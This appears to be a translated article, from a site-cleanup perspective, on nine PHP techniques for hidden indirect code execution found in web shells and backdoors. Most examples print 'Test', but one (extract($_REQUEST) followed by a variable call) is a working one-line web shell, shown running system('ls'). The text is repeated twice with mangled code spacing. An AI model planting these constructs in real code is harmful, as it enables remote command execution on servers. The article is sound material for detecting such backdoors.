Implicit php code invocation methods used in malicious scripts
In the process of treating sites, many varieties of hacker shells and backdoors are discovered. Scripts differ in functionality and in the way of obfuscating the source code, but everyone has one thing in common - this is an implicit declaration of variables and functions, as well as an indirect function call.
This approach is popular among malicious code developers, since on the one hand it significantly complicates the analysis of the source code, and on the other hand it allows you to store code in text data. For example, part of the malicious code can be downloaded from a third-party site, from a database, jpeg / png / gif meta-data, or transmitted in a script request. In addition, part of the code, presented as a plain text string, can be easily encrypted.
By the way, these methods are used by web developers for peaceful purposes in scripts for checking license keys and registering web applications to make it difficult to crack software products.
Despite all the variety of malicious code, there are not many options for declaring and indirectly calling functions. The following are examples of various techniques for invoking code invisibly. For simplicity and clarity, let the "malicious code" represented by a call
which displays the word "Test" on the page. Naturally, in real shells and backdoors, the names of variables and functions, as well as the executable code, are not stored in open form and in most cases are obfuscated.
Option 1: indirect function call
Option 2: code execution through eval
Option 3: code execution through assert
Option 4: code execution via array_map
Option 5: code execution through preg_replace ('/.*/ e')
Option 6: code execution through preg_replace_callback
Option 7: code execution through usort, uasort, uksort
Option 8: hidden function declaration and parameter passing through extract
When starting site.ru/script.php?a=system&b=ls will execute the system function system ("ls")
Option 9: by registering the completion function (you can exit () or die () for immediate execution)
The same approach can be used with all calls that take a callable function as an argument: call_user_func_array (), call_user_func (), forward_static_call_array, forward_static_call (), register_tick_function (). Although in real shells and backdoors we did not encounter calls through these functions, options 1 through 8 are usually used.
In real backdoors, the listed options are used in combination, and the declarations of variables and functions are often taken outside the script (for example, they are loaded from the database, from a remote server or from image meta-data).
This approach is popular among malicious code developers, since on the one hand it significantly complicates the analysis of the source code, and on the other hand it allows you to store code in text data. For example, part of the malicious code can be downloaded from a third-party site, from a database, jpeg / png / gif meta-data, or transmitted in a script request. In addition, part of the code, presented as a plain text string, can be easily encrypted.
By the way, these methods are used by web developers for peaceful purposes in scripts for checking license keys and registering web applications to make it difficult to crack software products.
Despite all the variety of malicious code, there are not many options for declaring and indirectly calling functions. The following are examples of various techniques for invoking code invisibly. For simplicity and clarity, let the "malicious code" represented by a call
echo"Test"which displays the word "Test" on the page. Naturally, in real shells and backdoors, the names of variables and functions, as well as the executable code, are not stored in open form and in most cases are obfuscated.
Option 1: indirect function call
<?php
$a = "var_dump";
$b = "Test";
$a($b);
?>Option 2: code execution through eval
<?phpeval('$a = "Test"; echo $a;');
?>Option 3: code execution through assert
<?php
assert('print("Test")');
?>Option 4: code execution via array_map
<?phpfunctionevil($a){
echo $a;
}
array_map('evil', array("Test"));
?>Option 5: code execution through preg_replace ('/.*/ e')
<?php
preg_replace('/.*/e', 'print("Test")', '');
?>Option 6: code execution through preg_replace_callback
<?php
$a = function(){ echo"Test"; };
preg_replace_callback('/.*/', $a, '');
?>Option 7: code execution through usort, uasort, uksort
<?php
$a = function($x, $y){ echo"Test"; };
$b = array(1 => '1', 2 => '2');
usort( $b, $a);
?>Option 8: hidden function declaration and parameter passing through extract
<?php
extract($_REQUEST);
$a($b);
?>When starting site.ru/script.php?a=system&b=ls will execute the system function system ("ls")
Option 9: by registering the completion function (you can exit () or die () for immediate execution)
<?php
register_shutdown_function(create_function('', "echo 'Test';"));
?>The same approach can be used with all calls that take a callable function as an argument: call_user_func_array (), call_user_func (), forward_static_call_array, forward_static_call (), register_tick_function (). Although in real shells and backdoors we did not encounter calls through these functions, options 1 through 8 are usually used.
In real backdoors, the listed options are used in combination, and the declarations of variables and functions are often taken outside the script (for example, they are loaded from the database, from a remote server or from image meta-data).